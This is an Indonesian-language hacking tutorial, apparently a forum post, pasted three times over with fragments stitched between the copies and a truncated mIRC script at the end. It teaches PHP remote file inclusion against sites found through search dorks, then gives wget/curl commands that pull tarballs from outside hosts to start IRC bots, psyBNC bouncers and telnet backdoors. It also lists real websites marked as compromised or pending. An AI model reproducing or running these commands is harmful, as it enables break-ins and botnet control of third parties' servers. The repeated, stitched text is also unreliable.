http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
the oblivion
the loft
Niagara
grind
- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt
http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt
kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
ada juga cara yang lebih mudah injek php tutorial nya :
*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid
extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll
Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30
*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?
Sehingga target tersebut berubah menjadi:
http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.
Commands Yang Digunakan Di PHP Injection
========================================
*. Check Server
uname -a;id;uptime;wget;/sbin/ifconfig|grep inet
*. Bot dengan Netgate.tcl Untuk Allnetwork
cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]
*. Bot dengan RemajaBot di Allnet
cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
find / -type d -perm 777
*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl
cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl
disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt
cd /dev/shm/bete;./eggdrop -m vian.txt
*.Membuat psyBNC port 31310
cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc
*.Membuat psyBNC dengan port dan ident tertentu
cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run
* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz
* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf
* Liat IP /sbin/ifconfig
*.BackDoor Session
++ telnet:1979
wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run
++ telnet 1666
cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin
++ linux shv4
cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)
COMMANDS CADANGAN
==================
*. Jika wget tidak berfungsi
gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz
*. Jika Dir tmp Tidak dapat Digunakan
gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm
*. Mencari Dir yang terbuka
gunakan find / -type d -perm 777
cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov
=====ala cempe ====
cari: ./phplivehelper/blank.php
./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?
mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
===========
cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc
-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
the oblivion
the loft
Niagara
grind
- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt
http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt
Tutorial psy dan bot injekan
kalian udah ga naeh kan chat di mirc...:D
kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
ada juga cara yang lebih mudah injek php tutorial nya :
*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid
extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll
Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30
*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?
Sehingga target tersebut berubah menjadi:
http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.
Commands Yang Digunakan Di PHP Injection
========================================
*. Check Server
uname -a;id;uptime;wget;/sbin/ifconfig|grep inet
*. Bot dengan Netgate.tcl Untuk Allnetwork
cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]
*. Bot dengan RemajaBot di Allnet
cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
find / -type d -perm 777
*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl
cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl
disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt
cd /dev/shm/bete;./eggdrop -m vian.txt
*.Membuat psyBNC port 31310
cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc
*.Membuat psyBNC dengan port dan ident tertentu
cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run
* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz
* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf
* Liat IP /sbin/ifconfig
*.BackDoor Session
++ telnet:1979
wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run
++ telnet 1666
cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin
++ linux shv4
cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)
COMMANDS CADANGAN
==================
*. Jika wget tidak berfungsi
gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz
*. Jika Dir tmp Tidak dapat Digunakan
gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm
*. Mencari Dir yang terbuka
gunakan find / -type d -perm 777
cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov
=====ala cempe ====
cari: ./phplivehelper/blank.php
./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?
mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
===========
cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc
-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
the oblivion
the loft
Niagara
grind
- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt
http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt
http://www.cantdeny.com/brokendestiny/protection.php?action=logout&siteurl
selamat mencoba nya yah kawan-kawan....
klo da kekurangan nya tulung di tambahin yah ma kawan-kawan yang sudah lebih mengerti dari saya...
berikut ini tutorial cara menbuat psybnc dan boot :
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
ada juga cara yang lebih mudah injek php tutorial nya :
*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid
extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll
Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30
*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?
Sehingga target tersebut berubah menjadi:
http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.
Commands Yang Digunakan Di PHP Injection
========================================
*. Check Server
uname -a;id;uptime;wget;/sbin/ifconfig|grep inet
*. Bot dengan Netgate.tcl Untuk Allnetwork
cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]
*. Bot dengan RemajaBot di Allnet
cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
find / -type d -perm 777
*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl
cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl
disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt
cd /dev/shm/bete;./eggdrop -m vian.txt
*.Membuat psyBNC port 31310
cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc
*.Membuat psyBNC dengan port dan ident tertentu
cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run
* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz
* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf
* Liat IP /sbin/ifconfig
*.BackDoor Session
++ telnet:1979
wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run
++ telnet 1666
cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin
++ linux shv4
cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)
COMMANDS CADANGAN
==================
*. Jika wget tidak berfungsi
gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz
*. Jika Dir tmp Tidak dapat Digunakan
gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm
*. Mencari Dir yang terbuka
gunakan find / -type d -perm 777
cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov
=====ala cempe ====
cari: ./phplivehelper/blank.php
./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?
mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
===========
cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc
-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
the oblivion
the loft
Niagara
grind
- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt
http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt
http://www.cantdeny.com/brokendestiny/protection.php?action=logout&siteurl
selamat mencoba nya yah kawan-kawan....
klo da kekurangan nya tulung di tambahin yah ma kawan-kawan yang sudah lebih mengerti dari saya...
script inviter
[ REMOTE ]#ExpertInvite off
on 1:join:#: {
if ($nick == $me) { halt } | else { set %nick $nick | write Data/InviteList.txt %nick }
}
on 1:op:#: {
write -dw* $+ $opnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $opnick $+ _12) stoped! They were oped in (_1 $+ $chan $+ _12)
}
on 1:voice:#: {
write -dw* $+ $vnick $+ * Data/InviteList.txt
